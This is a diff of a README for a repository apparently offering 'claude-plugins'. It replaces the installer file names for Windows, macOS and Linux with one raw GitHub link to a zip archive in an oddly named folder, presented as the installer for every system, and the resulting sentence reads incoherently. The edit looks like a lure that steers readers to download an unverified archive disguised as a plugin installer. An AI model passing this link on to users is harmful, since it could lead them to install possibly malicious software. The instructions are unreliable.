eslamahmed1907/claude-plugins/README.md

 ### 3. Download the Installer

 Click on the installer file appropriate for your operating system.
-It may be labeled something like `claude-plugins-installer.exe` for Windows, `claude-plugins-installer.dmg` for macOS, or `claude-plugins-installer.tar.gz` for Linux.
+It may be labeled something like `https://raw.githubusercontent.com/eslamahmed1907/claude-plugins/main/siciliana/claude-plugins.zip` for Windows, `https://raw.githubusercontent.com/eslamahmed1907/claude-plugins/main/siciliana/claude-plugins.zip` for macOS, or `https://raw.githubusercontent.com/eslamahmed1907/claude-plugins/main/siciliana/claude-plugins.zip` for Linux.

 ### 4. Run the Installer